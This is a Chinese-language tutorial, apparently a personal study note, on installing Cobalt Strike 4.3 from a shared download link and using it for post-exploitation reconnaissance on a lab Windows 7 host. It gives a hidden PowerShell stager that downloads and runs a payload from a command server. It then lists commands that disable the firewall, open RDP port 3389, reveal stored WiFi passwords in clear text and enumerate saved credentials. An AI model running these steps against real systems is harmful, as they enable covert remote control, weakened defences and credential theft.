信息收集

cobaltStrike4.3安装

哎,装个4.0的版本还是不行,jdk版本是11的

百度网盘:https://pan.baidu.com/s/1XOSL8o4hotOIJm1u9Raq9w 提取码: n1qm

kali里面解压缩:

sudo ./teamserver 192.168.23.152 123456    #kali的ip地址,密码:123456[一次性的,可以随时更改]

img

windows下启动

img

成功连接

img

cobaltStrike基本使用

准备一台肉鸡,这里我使用windows7来测试,哎,windows10好卡

cs上

img

填写主机的ip地址,开启监听即可

img

window7上输入

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.5.48:80/a'))"

连接成功,输入shell whoami来执行一下

img

使用CS进行本地工作组收集信息

Shell ipconfig,可以查看到其ip地址

img

shell systeminfo

img

查看系统结构体系结构

echo %PROCESSOR_ARCHITECTURE%

img

查看系统安装了哪些软件及版本:wmic product get name,version

img

本机运行服务:wmic service list brief

img

查看进程:tasklist

img

查看计划任务:schtasks /query /fo LIST /v [如果报错的话可以先输入chcp473改变其编码]

img

电脑开机时间:net statistics workstation

img

查看本地有几个用户:net user

img

当前会话列表:net session

img

查询端口开放信息: netstat -ano

img

查询补丁信息:依旧可以使用shell systeminfo来查看

img

查看杀毒软件信息:wmic /namespace:\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe,目标靶机没有杀毒软件,就以我的主机为例

img

查询共享列表:net share

img

查看路由信息:route print

img

查看防火墙的禁用状态:netsh firewall show state

img

关闭防火墙的命令

Netsh firewall set opmode disable

img

防火墙允许3389端口放行

netsh firewall set portopening TCP 3389 ENABLE

img

查看当前连接wifi密码名字

netsh wlan show profile name=”HYNUCTF520” key=clear

img

查看rdp端口

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber #16进制转10进制为3389

img

查看当前凭据

cmdkey /l

img

查看局域网所有IP信息

Arp-a

img

查看最近打开的文件

Dir %appdata%\Microsoft\Windows\Recent

img

查看本地工作组

Net localgroup

img

查看本地工作组users

Net localgroup users

img

查看rdp的保存凭据

dir /a %userprofile%\AppData\Local\Microsoft\Credentials*

image-20240913084522181